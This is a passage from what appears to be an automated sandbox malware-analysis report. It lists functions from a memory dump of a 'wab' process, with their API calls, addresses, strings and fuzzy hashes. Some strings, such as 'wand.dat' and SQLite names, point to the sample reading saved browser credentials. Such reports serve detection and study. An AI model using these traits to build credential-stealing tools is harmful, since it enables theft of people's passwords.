                                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1889144086-0
                                                                                                                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1661045500-0
                                                                                                                                                                                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                                                                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1549203181-0
                                                                                                                                                                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                                          • Opcode ID: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d2dee96b5e0c3aea304ed2264281ba89f9e94ec92aede7506340a7c7d04724
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                                          • Opcode ID: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: be216efb729f49d9b3453cff3a07ca29206f97cb50f4c40f8d3ab9401fa12aed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                          • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                                          • Opcode ID: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b35f5ae7fefd5d66d25ec59d6127a866c9c92b2d2e026b1e9a4331286ce66ec4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID: sqlite_master
                                                                                                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                                                                                                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75B9DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75B9DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                                          • Opcode ID: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
